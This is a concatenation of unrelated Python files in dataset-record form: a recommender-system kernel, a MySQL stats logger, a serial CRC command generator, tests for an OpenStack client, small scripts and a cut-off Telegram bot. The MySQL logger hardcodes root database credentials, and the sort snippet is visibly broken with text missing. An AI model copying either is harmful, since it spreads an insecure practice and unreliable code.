and not isinstance(X, sps.lil_matrix):\n        return X.tolil().astype(dtype)\n    else:\n        return X.astype(dtype)\n\nclass Cosine_Similarity:\n\n\n    def __init__(self, dataMatrix, topK=100, shrink = 0, normalize = True,\n                 mode = \"cosine\"):\n        \"\"\"\n        Computes the cosine similarity on the columns of dataMatrix\n        If it is computed on URM=|users|x|items|, pass the URM as is.\n        If it is computed on ICM=|items|x|features|, pass the ICM transposed.\n        :param dataMatrix:\n        :param topK:\n        :param shrink:\n        :param normalize:\n        :param mode: \"cosine\" computes Cosine similarity\n                     \"adjusted\" computes Adjusted Cosine, removing the average of the users\n                     \"pearson\" computes Pearson Correlation, removing the average of the items\n                     \"jaccard\" computes Jaccard similarity for binary interactions using Tanimoto\n                     \"tanimoto\" computes Tanimoto coefficient for binary interactions\n\n        \"\"\"\n\n        super(Cosine_Similarity, self).__init__()\n\n        self.TopK = topK\n        self.shrink = shrink\n        self.normalize = normalize\n        self.n_columns = dataMatrix.shape[1]\n        self.n_rows = dataMatrix.shape[0]\n\n        self.dataMatrix = dataMatrix.copy()\n\n        self.adjusted_cosine = False\n        self.pearson_correlation = False\n        self.tanimoto_coefficient = False\n\n        if mode == \"adjusted\":\n            self.adjusted_cosine = True\n        elif mode == \"pearson\":\n            self.pearson_correlation = True\n        elif mode == \"jaccard\" or mode == \"tanimoto\":\n            self.tanimoto_coefficient = True\n            # Tanimoto has a specific kind of normalization\n            self.normalize = False\n\n        elif mode == \"cosine\":\n            pass\n        else:\n            raise ValueError(\"Cosine_Similarity: value for parameter 'mode' not recognized.\"\n                             \" Allowed values are: 'cosine', 'pearson', 'adjusted', 'jaccard', 'tanimoto'.\"\n                             \" Passed value was '{}'\".format(mode))\n\n\n\n        if self.TopK == 0:\n            self.W_dense = np.zeros((self.n_columns, self.n_columns))\n\n\n\n\n    def applyAdjustedCosine(self):\n        \"\"\"\n        Remove from every data point the average for the corresponding row\n        :return:\n        \"\"\"\n\n        self.dataMatrix = check_matrix(self.dataMatrix, 'csr')\n\n\n        interactionsPerRow = np.diff(self.dataMatrix.indptr)\n\n        nonzeroRows = interactionsPerRow > 0\n        sumPerRow = np.asarray(self.dataMatrix.sum(axis=1)).ravel()\n\n        rowAverage = np.zeros_like(sumPerRow)\n        rowAverage[nonzeroRows] = sumPerRow[nonzeroRows] / interactionsPerRow[nonzeroRows]\n\n\n        # Split in blocks to avoid duplicating the whole data structure\n        start_row = 0\n        end_row= 0\n\n        blockSize = 1000\n\n\n        while end_row < self.n_rows:\n\n            end_row = min(self.n_rows, end_row + blockSize)\n\n            self.dataMatrix.data[self.dataMatrix.indptr[start_row]:self.dataMatrix.indptr[end_row]] -= \\\n                np.repeat(rowAverage[start_row:end_row], interactionsPerRow[start_row:end_row])\n\n            start_row += blockSize\n\n\n\n\n    def applyPearsonCorrelation(self):\n        \"\"\"\n        Remove from every data point the average for the corresponding column\n        :return:\n        \"\"\"\n\n        self.dataMatrix = check_matrix(self.dataMatrix, 'csc')\n\n\n        interactionsPerCol = np.diff(self.dataMatrix.indptr)\n\n        nonzeroCols = interactionsPerCol > 0\n        sumPerCol = np.asarray(self.dataMatrix.sum(axis=0)).ravel()\n\n        colAverage = np.zeros_like(sumPerCol)\n        colAverage[nonzeroCols] = sumPerCol[nonzeroCols] / interactionsPerCol[nonzeroCols]\n\n\n        # Split in blocks to avoid duplicating the whole data structure\n        start_col = 0\n        end_col= 0\n\n        blockSize = 1000\n\n\n        while end_col < self.n_columns:\n\n            end_col = min(self.n_columns, end_col + blockSize)\n\n            self.dataMatrix.data[self.dataMatrix.indptr[start_col]:self.dataMatrix.indptr[end_col]] -= \\\n                
np.repeat(colAverage[start_col:end_col], interactionsPerCol[start_col:end_col])\n\n start_col += blockSize\n\n\n def useOnlyBooleanInteractions(self):\n\n # Split in blocks to avoid duplicating the whole data structure\n start_pos = 0\n end_pos= 0\n\n blockSize = 1000\n\n\n while end_pos < len(self.dataMatrix.data):\n\n end_pos = min(len(self.dataMatrix.data), end_pos + blockSize)\n\n self.dataMatrix.data[start_pos:end_pos] = np.ones(end_pos-start_pos)\n\n start_pos += blockSize\n\n\n\n\n def compute_similarity(self):\n\n values = []\n rows = []\n cols = []\n\n start_time = time.time()\n start_time_print_batch = start_time\n processedItems = 0\n\n if self.adjusted_cosine:\n self.applyAdjustedCosine()\n\n elif self.pearson_correlation:\n self.applyPearsonCorrelation()\n\n elif self.tanimoto_coefficient:\n self.useOnlyBooleanInteractions()\n\n\n # We explore the matrix column-wise\n self.dataMatrix = check_matrix(self.dataMatrix, 'csc')\n\n\n # Compute sum of squared values to be used in normalization\n sumOfSquared = np.array(self.dataMatrix.power(2).sum(axis=0)).ravel()\n\n # Tanimoto does not require the square root to be applied\n if not self.tanimoto_coefficient:\n sumOfSquared = np.sqrt(sumOfSquared)\n\n\n # Compute all similarities for each item using vectorization\n for columnIndex in range(self.n_columns):\n\n processedItems += 1\n\n if time.time() - start_time_print_batch >= 30 or processedItems==self.n_columns:\n columnPerSec = processedItems / (time.time() - start_time)\n\n print(\"Similarity column {} ( {:2.0f} % ), {:.2f} column/sec, elapsed time {:.2f} secs\".format(\n processedItems, processedItems / self.n_columns * 100, columnPerSec, (time.time() - start_time)))\n\n sys.stdout.flush()\n sys.stderr.flush()\n\n start_time_print_batch = time.time()\n\n\n # All data points for a given item\n item_data = self.dataMatrix[:, columnIndex]\n item_data = item_data.toarray().squeeze()\n\n # Compute item similarities\n this_column_weights = self.dataMatrix.T.dot(item_data)\n this_column_weights[columnIndex] = 0.0\n\n # Apply normalization and shrinkage, ensure denominator != 0\n if self.normalize:\n denominator = sumOfSquared[columnIndex] * sumOfSquared + self.shrink + 1e-6\n this_column_weights = np.multiply(this_column_weights, 1 / denominator)\n\n # Apply the specific denominator for Tanimoto\n elif self.tanimoto_coefficient:\n denominator = sumOfSquared[columnIndex] + sumOfSquared - this_column_weights + self.shrink + 1e-6\n this_column_weights = np.multiply(this_column_weights, 1 / denominator)\n\n # If no normalization or tanimoto is selected, apply only shrink\n elif self.shrink != 0:\n this_column_weights = this_column_weights/self.shrink\n\n\n if self.TopK == 0:\n self.W_dense[:, columnIndex] = this_column_weights\n\n else:\n # Sort indices and select TopK\n # Sorting is done in three steps. 
Faster than plain np.argsort for a higher number of items\n                # - Partition the data to extract the set of relevant items\n                # - Sort only the relevant items\n                # - Get the original item index\n                relevant_items_partition = (-this_column_weights).argpartition(self.TopK-1)[0:self.TopK]\n                relevant_items_partition_sorting = np.argsort(-this_column_weights[relevant_items_partition])\n                top_k_idx = relevant_items_partition[relevant_items_partition_sorting]\n\n                # Incrementally build sparse matrix\n                values.extend(this_column_weights[top_k_idx])\n                rows.extend(top_k_idx)\n                cols.extend(np.ones(self.TopK) * columnIndex)\n\n        if self.TopK == 0:\n            return self.W_dense\n\n        else:\n\n            W_sparse = sps.csr_matrix((values, (rows, cols)),\n                                      shape=(self.n_columns, self.n_columns),\n                                      dtype=np.float32)\n\n\n            return W_sparse\n\nclass User_CFKNNRecSys():\n\n    def __init__(self, URM_train, k=100, shrink=0):\n        self._URM_train = URM_train.tocsr()\n        self._k = k\n        self._shrink = shrink\n\n    def fit(self):\n        self._similarity_matrix = Cosine_Similarity(self._URM_train.T, self._k, self._shrink, normalize=False, mode='cosine').compute_similarity()\n\n    def recommend(self, user_id, at=None, exclude_seen=True):\n        # compute the scores using the dot product\n        scores = self._similarity_matrix[user_id].dot(self._URM_train).toarray().ravel()\n\n        if exclude_seen:\n            scores = self.filter_seen(user_id, scores)\n\n        # rank items\n        ranking = scores.argsort()[::-1]\n\n        return ranking[:at]\n\n    def filter_seen(self, user_id, scores):\n\n        start_pos = int(self._URM_train.indptr[user_id])\n        end_pos = int(self._URM_train.indptr[user_id + 1])\n\n        user_profile = self._URM_train.indices[start_pos:end_pos]\n\n        scores[user_profile] = -np.inf\n\n        return scores\n\n    def recommendALL(self, userList, at=10):\n        res = np.array([])\n        n=0\n        for i in userList:\n            n+=1\n            recList = self.recommend(i, at)\n            tuple = np.concatenate((i, recList))\n            if (res.size == 0):\n                res = tuple\n            else:\n                res = np.vstack([res, tuple])\n        return res\n\nclass Item_CFKNNRecSys():\n\n    def __init__(self, URM_train, k=100, shrink=0):\n        self._URM_train = URM_train.tocsr()\n        self._k = k\n        self._shrink = shrink\n\n    def fit(self):\n        self._similarity_matrix = Cosine_Similarity(self._URM_train.tocsc(), self._k, self._shrink, normalize=False, mode='cosine').compute_similarity()\n\n    def recommend(self, user_id, at=None, exclude_seen=True):\n        # compute the scores using the dot product\n        user_profile = self._URM_train[user_id]\n        scores = user_profile.dot(self._similarity_matrix).toarray().ravel()\n\n        if exclude_seen:\n            scores = self.filter_seen(user_id, scores)\n\n        # rank items\n        ranking = scores.argsort()[::-1]\n\n        return ranking[:at]\n\n    def filter_seen(self, user_id, scores):\n\n        start_pos = int(self._URM_train.indptr[user_id])\n        end_pos = int(self._URM_train.indptr[user_id + 1])\n\n        user_profile = self._URM_train.indices[start_pos:end_pos]\n\n        scores[user_profile] = -np.inf\n\n        return scores\n\n    def recommendALL(self, userList, at=10):\n        res = np.array([])\n        n=0\n        for i in userList:\n            n+=1\n            recList = self.recommend(i, at)\n            tuple = np.concatenate((i, recList))\n            if (res.size == 0):\n                res = tuple\n            else:\n                res = np.vstack([res, tuple])\n        return res\n\nclass ensemble_CFKNNRecSys():\n    def __init__(self, URM_train, k=100, alpha=0.07809/(0.07809+0.08188) , beta=0.08188/(0.07809+0.08188), shrink=0):\n        self._URM_train = URM_train.tocsr()\n        self._k = k\n        self._shrink = shrink\n\n        self.UUSCORE = alpha\n\n        self.IISCORE = beta\n\n    def fit(self):\n        self._similarity_matrixUU = Cosine_Similarity(self._URM_train.T, 
self._k, self._shrink, normalize=True, mode='cosine').compute_similarity()\n self._similarity_matrixII = Cosine_Similarity(self._URM_train.tocsc(), self._k, self._shrink, normalize=True, mode='cosine').compute_similarity()\n\n def recommend(self, user_id, at=None, exclude_seen=True):\n # compute the scores using the dot product\n user_profile = self._URM_train[user_id]\n scores = (self.IISCORE*user_profile.dot(self._similarity_matrixII).toarray() +\n self.UUSCORE*self._similarity_matrixUU[user_id].dot(self._URM_train).toarray() ).ravel()\n\n if exclude_seen:\n scores = self.filter_seen(user_id, scores)\n\n # rank items\n ranking = scores.argsort()[::-1]\n\n return ranking[:at]\n\n def filter_seen(self, user_id, scores):\n\n start_pos = int(self._URM_train.indptr[user_id])\n end_pos = int(self._URM_train.indptr[user_id + 1])\n\n user_profile = self._URM_train.indices[start_pos:end_pos]\n\n scores[user_profile] = -np.inf\n\n return scores\n\n def recommendALL(self, userList, at=10):\n res = np.array([])\n n=0\n for i in userList:\n n+=1\n recList = self.recommend(i, at)\n tuple = np.concatenate((i, recList))\n if (res.size == 0):\n res = tuple\n else:\n res = np.vstack([res, tuple])\n return res\n\n\ndef xvalidation_par(elements=1500, folds=10):\n maps = []\n alphas = []\n for i in range(0, elements):\n alpha = np.random.uniform(0, 1)\n data = []\n for j in range(0, folds):\n beta = 1 - alpha\n res = main(alpha, beta)\n map = res[\"MAP\"]\n data.append(map)\n data_array = np.array(data)\n mean = np.average(data_array)\n alphas.append(alpha)\n maps.append(mean)\n print('\\n \\n_____________________________________')\n print('finished iteration {0} with a = {1}'.format(i, alpha))\n print('_____________________________________\\n \\n')\n\n d = {\"alpha\" : alphas, \"map\" : maps}\n df = pd.DataFrame(data=d, index=None)\n df.to_csv(\"../../results/evaluation/data_ensembleCF.csv\", index=None)\n\ndef main(alpha, beta):\n URM_text = np.loadtxt('../../data/train.csv', delimiter=',', dtype=int, skiprows=1)\n user_list, item_list = zip(*URM_text)\n rating_list = np.ones(len(user_list))\n URM = sps.csr_matrix((rating_list, (user_list, item_list)))\n\n URM_train, URM_test = utils.train_test_holdout(URM, 0.8)\n\n cf = ensemble_CFKNNRecSys(URM_train, 50, alpha, beta,)\n cf.fit()\n\n target = pd.read_csv('../../data/target_playlists.csv', index_col=False)\n recommended = cf.recommendALL(target.values)\n\n playlists = recommended[:, 0]\n recommended = np.delete(recommended, 0, 1)\n i = 0\n res_fin = []\n for j in recommended:\n res = ''\n for k in range(0, len(j)):\n res = res + '{0} '.format(j[k])\n res_fin.append(res)\n i = i + 1\n d = {'playlist_id': playlists, 'track_ids': res_fin}\n df = pd.DataFrame(data=d, index=None)\n df.to_csv(\"../../results/recommendedCFtest_test_recommend_all.csv\", index=None)\n\n return utils.evaluate_csv(URM_test, \"../../results/recommendedCFtest_test_recommend_all.csv\")\n\nif __name__ == '__main__':\n xvalidation_par(1500, 10)\n","sub_path":"old_stuff/kernels/ensemble_CF.py","file_name":"ensemble_CF.py","file_ext":"py","file_size_in_byte":15988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"517845727","text":"#!/usr/bin/env python3\nimport psutil\nimport sys\nimport mysql.connector\nfrom mysql.connector import Error\n\ndef connect():\n \"\"\" Connect to MySQL database \"\"\"\n try:\n conn = mysql.connector.connect(host='localhost',\n database='cl-autotest',\n user='root',\n password='root')\n if 
conn.is_connected():\n            print('Connected to MySQL database')\n            x = conn.cursor()\n            print('Collect data')\n            cpu_usage = psutil.cpu_percent(interval=60, percpu=False)\n            disk_free = psutil.disk_usage('/home').percent\n            print(cpu_usage)\n            print(disk_free)\n            print('Export to MySQL')\n            # use a parameterized query instead of string interpolation to avoid SQL injection\n            x.execute(\"INSERT INTO `stats` (`cpu_usage`, `disk_free`) VALUES (%s, %s)\", (cpu_usage, disk_free))\n            conn.commit()\n\n    except Error as errorik:\n        print(errorik)\n\n\n    finally:\n        # conn may be unbound if connect() itself failed\n        if 'conn' in locals():\n            conn.close()\n\nif __name__ == '__main__':\n    connect()","sub_path":"system/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"546571469","text":"#!/usr/bin/python3\n\ndef compute_crc8_atm(datagram, initial_value=0):\n    crc = initial_value\n    # Iterate bytes in data\n    for byte in datagram:\n        # Iterate bits in byte\n        for _ in range(0, 8):\n            if (crc >> 7) ^ (byte & 0x01):\n                crc = ((crc << 1) ^ 0x07) & 0xFF\n            else:\n                crc = (crc << 1) & 0xFF\n            # Shift to next bit\n            byte = byte >> 1\n    return crc\n    \n\ndef write_bytes(addr, reg, data):\n\tpad = 0x05\n\treg |= 0x80\n\tto_send = [pad, addr, reg]+data\n\tcrc = compute_crc8_atm(to_send)\n\tto_send += [crc]\n\treturn \"\".join(['\\\\x'+hex(byte)[2:] for byte in to_send])\n\t\t\n# Write Rsense int\nfor i in range(4):\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x00, [0x00, 0x00, 0x01, 0x82])+\"\\\" > /dev/ttyS2\")\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x00, [0x00, 0x00, 0x01, 0x82])+\"\\\" > /dev/ttyS3\")\n\n# Write Ihold\nfor i in range(4):\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x10, [0x00, 0x00, 0x00, 0x00])+\"\\\" > /dev/ttyS2\")\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x10, [0x00, 0x00, 0x00, 0x00])+\"\\\" > /dev/ttyS3\")\n\t\n# Chopconf\nfor i in range(4):\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x6C, [0x15, 0x00, 0x00, 0x53])+\"\\\" > /dev/ttyS2\")\n\tprint(\"echo -n -e \\\"\"+write_bytes(i, 0x6C, [0x15, 0x00, 0x00, 0x53])+\"\\\" > /dev/ttyS3\")\n\t\n\n","sub_path":"tests/test_recore/crc.py","file_name":"crc.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"397654219","text":"import socket\n\n# Initialize the socket\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# Connect to localhost\nclient_socket.connect(('127.0.0.1', 5555))\n\nwhile True:\n    # Read input data to send to the server\n    msg = str(input('> '))\n    # Send the data to the server\n    client_socket.sendall(str.encode(msg))\n","sub_path":"BaseClient.py","file_name":"BaseClient.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"415933727","text":"def conversor(horas):\r\n    if horas < 12:\r\n        horario = 'A.M'\r\n    elif horas >= 12:\r\n        horario = 'P.M'\r\n    \r\n    if horas > 12:\r\n        horas -= 12\r\n    return(horas, horario)\r\n    \r\ndef saida(dados, minutos):\r\n    # unpack the (hours, period) tuple returned by conversor; the original referenced an undefined 'horario'\r\n    horas, horario = dados\r\n    print('{}:{} {}' .format(horas, minutos, horario))\r\n\r\nentrada = input().split()\r\nhoras = int(entrada[0])\r\nminutos = int(entrada[1])\r\n\r\nsaida(conversor(horas), minutos)","sub_path":"listas/lista-05/questao06.py","file_name":"questao06.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"11283126","text":"\"\"\"Stanford Code in Place 2021 - Final Project:\nCreating a heatmap visualization with seaborn \nsubmission by Adelaide 
Atakora\n\n\nTo run a demo of this program, ensure you have the following packages installed: pandas, seaborn, and matplotlib.\"\"\"\n\n\n# Imports the following packages\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n# Creates a heatmap from a pandas pivot table with seaborn\ndef create_heatmap(df):\n    # Creates a pandas pivot table to hold the data for the heatmap\n    heatmap_data = pd.pivot_table(\n        df, index='continent', columns='year', values='lifeExp')\n    # Prints the heatmap table as an output\n    print(heatmap_data)\n\n    # Creates the heatmap from the pivot table data\n    sns.heatmap(heatmap_data)\n\n\n# Renders the heatmap with matplotlib.pyplot\ndef plot_heatmap_image():\n    # Plots the title of the heatmap\n    plt.title(\"Heatmap of Life Expectancy Over the Years by Continent\")\n\n    # Displays the heatmap window\n    plt.show()\n\n\n# Calls all the relevant code pieces to be executed in main\ndef main():\n    # Reads csv data from file located in the specified path\n    df = pd.read_csv(\n        r'https://raw.githubusercontent.com/Adela7/StanfordCodeinPlace21Project/main/LifeExpectancybyCountry.csv')\n    # prints DataFrame to output\n    print(df)\n\n    # Calls the create_heatmap() function to create a heatmap using the DataFrame above\n    create_heatmap(df)\n\n    # Calls the plot_heatmap_image() function to plot and display the heatmap\n    plot_heatmap_image()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"CiP21projbyAdelaideA.py","file_name":"CiP21projbyAdelaideA.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"66446226","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport ddt\nimport uuid\n\nfrom tempest_lib.cli import output_parser\nfrom tempest_lib import exceptions\n\nfrom afloclient.tests.functional import base\n\n\n@ddt.ddt\nclass ClientTestCatalogContents(base.BaseTestCase):\n    \"\"\"Test catalog contents of aflo component service.\"\"\"\n\n    @ddt.data('admin', 'user')\n    def test_catalog_contents(self, role):\n        \"\"\"Test of 'Catalog contents commands'\n        Test the operation of the List, Get, Update, and Delete commands.\n        :param role: running user.\n        \"\"\"\n        catalog_id = 'catalog0-1111-2222-3333-100000000001'\n        seq_no = None\n\n        # Add records\n        seq_no, seq_no_dammy = \\\n            self._create_catalog_contents('admin', catalog_id)\n\n        # Get records by list.\n        self._list_catalog_contents(role, catalog_id, seq_no)\n\n        # Get records by catalog contents get.\n        self._show_catalog_contents(role, catalog_id, seq_no)\n\n        # Update records\n        if role == 'admin':\n            self._update_catalog_contents(role,\n                                          catalog_id,\n                                          seq_no)\n\n        # Delete records\n        self.clients['admin']\\\n            .run_command('catalog-contents-delete',\n                         params=' --catalog-id %s --seq-no %s' %\n                         (catalog_id, seq_no))\n\n        self.clients['admin']\\\n            .run_command('catalog-contents-delete',\n                         params=' --catalog-id %s --seq-no %s' %\n                         ('catalog0-1111-2222-3333-100000000002',\n                          seq_no_dammy))\n\n        self.assertRaises(exceptions.CommandFailed,\n                          self.clients['admin'].run_command,\n                          'catalog-contents-delete',\n                          params=' --catalog-id %s --seq-no %s' %\n                          (catalog_id, seq_no))\n\n    def _create_catalog_contents(self, role, catalog_id):\n        \"\"\"Create catalog contents data.\n        :param role: running user.\n        :param catalog_id: Catalog id.\n        \"\"\"\n        st_create_dammy = self.clients[role].run_command(\n            'catalog-contents-create',\n            params=' --catalog-id {0}'\n                   ' --goods-id {1}'\n                   ' --goods-num {2}'\n            .format('catalog0-1111-2222-3333-100000000002',\n                    'goods_id_dammy',\n                    '5678'))\n\n        st_create = self.clients[role].run_command(\n            'catalog-contents-create',\n            params=' --catalog-id {0}'\n                   ' --goods-id {1}'\n                   ' --goods-num {2}'\n            .format(catalog_id,\n                    'goods_id',\n                    '1234'))\n\n        # Check got UUID\n        seq_no = output_parser.tables(st_create)[0]['values'][0][1]\n        self.assertTrue(seq_no is not None)\n        seq_no_dammy = output_parser.tables(st_create_dammy)[0]['values'][0][1]\n        self.assertTrue(seq_no_dammy is not None)\n\n        # Check all param\n        check_param = {'catalog_id': catalog_id,\n                       'seq_no': seq_no,\n                       'goods_id': 'goods_id',\n                       'goods_num': '1234',\n                       }\n        self._check_return_param(\n            output_parser.tables(st_create)[0]['values'][0],\n            check_param)\n\n        return seq_no, seq_no_dammy\n\n    def _show_catalog_contents(self, role, catalog_id, seq_no):\n        \"\"\"Show catalog contents data.\n        :param role: running user.\n        :param catalog_id: Catalog id.\n        :param seq_no: Seq no.\n        \"\"\"\n        st_get = self.clients[role].run_command(\n            'catalog-contents-get',\n            params=' --catalog-id ' + catalog_id + ' --seq-no ' + seq_no)\n        catalog_contents = output_parser.tables(st_get)[0]['values'][0]\n\n        # Check all param\n        check_param = {'catalog_id': catalog_id,\n                       'seq_no': seq_no,\n                       'goods_id': 'goods_id',\n                       'goods_num': '1234',\n                       }\n        self._check_return_param(catalog_contents,\n                                 check_param)\n\n        return catalog_contents\n\n    def _list_catalog_contents(self, role, catalog_id, seq_no):\n        \"\"\"List catalog contents data.\n        :param role: running user.\n        :param catalog_id: Catalog id.\n        :param seq_no: Seq no.\n        \"\"\"\n        st_list = self.clients[role].run_command(\n            'catalog-contents-list',\n            params=' 
--catalog-id {0}'\n                   ' --limit {1}'\n                   ' --force-show-deleted {2}'\n            .format(catalog_id,\n                    '1000',\n                    'true'))\n\n        catalog_contents_list = output_parser.tables(st_list)[0]['values']\n        self.assertTrue(len(catalog_contents_list) >= 1)\n\n        # Check all param\n        result = False\n        for catalog_contents in catalog_contents_list:\n            if catalog_contents[1] == seq_no:\n                result = True\n                break\n\n        self.assertTrue(result)\n\n        return catalog_contents_list\n\n    def _update_catalog_contents(self,\n                                 role,\n                                 catalog_id,\n                                 seq_no):\n        \"\"\"Update catalog contents data.\n        :param role: running user.\n        :param catalog_id: Catalog id.\n        :param seq_no: Seq no.\n        \"\"\"\n        st_update = self.clients[role].run_command(\n            'catalog-contents-update',\n            params=' --catalog-id {0}'\n                   ' --seq-no {1}'\n                   ' --goods-id {2}'\n                   ' --goods-num {3}'\n            .format(catalog_id,\n                    seq_no,\n                    'goods_id_updated',\n                    '912'))\n\n        catalog_contents = output_parser.tables(st_update)[0]['values'][0]\n\n        # Check all param\n        check_param = {'catalog_id': catalog_id,\n                       'seq_no': seq_no,\n                       'goods_id': 'goods_id_updated',\n                       'goods_num': '912',\n                       }\n        self._check_return_param(catalog_contents, check_param)\n\n        return catalog_contents\n\n    def _check_return_param(self, return_data, check_param):\n        self.assertEqual(return_data[0], check_param['catalog_id'])\n        self.assertEqual(return_data[1], check_param['seq_no'])\n        self.assertEqual(return_data[2], check_param['goods_id'])\n        self.assertEqual(return_data[3], check_param['goods_num'])\n        self.assertIsNotNone(return_data[4])\n        self.assertIsNotNone(return_data[5])\n        self.assertEqual(return_data[6], 'None')\n        self.assertEqual(return_data[7], 'False')\n        self.assertEqual(return_data[8], 'None')\n        self.assertEqual(return_data[9], 'None')\n        self.assertEqual(return_data[10], 'None')\n        self.assertEqual(return_data[11], 'None')\n        self.assertEqual(return_data[12], 'None')\n        self.assertEqual(return_data[13], 'None')\n\n    @ddt.data('admin', 'user')\n    def test_catalog_contents_invalid_show_irregular_no_data(self, role):\n        \"\"\"Test of 'Catalog contents commands'\n        Test the operation of the Show command(Not exist seq no).\n        :param role: running user.\n        \"\"\"\n        catalog_id = 'catalog0-1111-2222-3333-000000000005'\n        seq_no = str(uuid.uuid4())\n\n        self.assertRaises(exceptions.CommandFailed,\n                          self.clients[role].run_command,\n                          'catalog-contents-show',\n                          params=' --catalog-id %s --seq-no %s' %\n                          (catalog_id, seq_no))\n\n    @ddt.data('admin', 'user')\n    def test_catalog_contents_list_irregular_params(self, role):\n        \"\"\"Test of 'Catalog contents commands'\n        Test the operation of the List command(Ignore parameters).\n        :param role: running user.\n        \"\"\"\n        catalog_id = 'catalog0-1111-2222-3333-000000000005'\n\n        args = [' --sort-key a',\n                ' --sort-dir a',\n                ' --limit a',\n                ' --marker a',\n                ' --force-show-deleted a']\n\n        for arg in args:\n            # List data.\n            self.assertRaises(exceptions.CommandFailed,\n                              self.clients[role].run_command,\n                              'catalog-contents-list %s %s' %\n                              (catalog_id, arg))\n\n    @ddt.data('user')\n    def test_catalog_contents_invalid_create_irregular_no_auth(self, role):\n        \"\"\"Test of 'Catalog contents commands'\n        Test the operation of the Create command(Not exist authority).\n        :param role: running user.\n        \"\"\"\n        catalog_id = 'catalog0-1111-2222-3333-000000000005'\n\n        self.assertRaises(exceptions.CommandFailed,\n                          self.clients[role].run_command,\n                          'catalog-contents-create',\n                          params=' --catalog-id {0}'\n                                 ' --goods-id {1}'\n                                 ' --goods-num {2}'\n                          .format(catalog_id, 'goods_id', '1234'))\n\n    
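# The negative tests below share one pattern: freshly generated uuid4 values stand in for records that do not exist, and every failure path is expected to surface as exceptions.CommandFailed.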
@ddt.data('admin', 'user')\n def test_catalog_contents_invalid_update_irregular_no_data(self, role):\n \"\"\"Test of 'Catalog contents commands'\n Test the operation of the Update command(Not exist seq no).\n :param role: running user.\n \"\"\"\n catalog_id = 'catalog0-1111-2222-3333-000000000005'\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-update',\n params=' --catalog-id {0}'\n ' --seq-no {1}'\n ' --goods-id {2}'\n ' --goods-num {3}'\n .format(catalog_id,\n seq_no, 'a', 'a'))\n\n @ddt.data('admin')\n def test_catalog_contents_invalid_delete_irregular_no_data(self, role):\n \"\"\"Do a test of 'Catalog contents commands'\n Test the operation of the Delete command(Not exist catalog id, seq no).\n \"\"\"\n catalog_id = str(uuid.uuid4())\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n (catalog_id, seq_no))\n\n @ddt.data('user')\n def test_catalog_contents_invalid_delete_irregular_no_authority(self,\n role):\n \"\"\"Do a test of 'Catalog contents commands'\n Test the operation of the Delete command(Not exist authority).\n \"\"\"\n catalog_id = str(uuid.uuid4())\n seq_no = str(uuid.uuid4())\n\n self.assertRaises(exceptions.CommandFailed,\n self.clients[role].run_command,\n 'catalog-contents-delete',\n params=' --catalog-id %s --seq-no %s' %\n (catalog_id, seq_no))\n","sub_path":"afloclient/tests/functional/test_catalog_contents.py","file_name":"test_catalog_contents.py","file_ext":"py","file_size_in_byte":11950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624158183","text":"import sys\nimport pandas as pd\nsys.path.append(\"..\")\n\nfrom Helper import helpers\n\nnoOfFour = []\n\nurl = 'https://www.espncricinfo.com/series/8039/commentary/1144525/bangladesh-vs-pakistan-43rd-match-icc-cricket-world-cup-2019' \nsoap = helpers.getAndParseURL(url)\ncomments = [x.span for x in soap.findAll(\"div\", {'class': 'commentary-item'})]\n\nfor comment in comments:\n\n\tif comment.get_text() == '4':\n\t\tprint(comment.get_text())\n\t\tnoOfFour.append(comment.getText())\n\ns = pd.Series(noOfFour)\nprint(s)","sub_path":"scrapper/espn.py","file_name":"espn.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"190879266","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 13 17:18:56 2021\r\n\r\n@author: Barathwaj Kesavan\r\n\"\"\"\r\n\r\na=[12,0,39,50,1]\r\ni=0\r\nwhile ia[j]:\r\n key=j\r\n j+=1\r\n a[i],a[key]=a[key],a[i]\r\n i+=1\r\nprint(a)\r\n\r\n\r\n","sub_path":"sort_while.py","file_name":"sort_while.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"516950739","text":"from flask import Flask, request\r\nimport telegram\r\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, Updater\r\nimport datetime\r\nimport pymongo\r\nfrom urllib.parse import quote_plus\r\nimport os\r\nimport time\r\nfrom concurrent.futures import 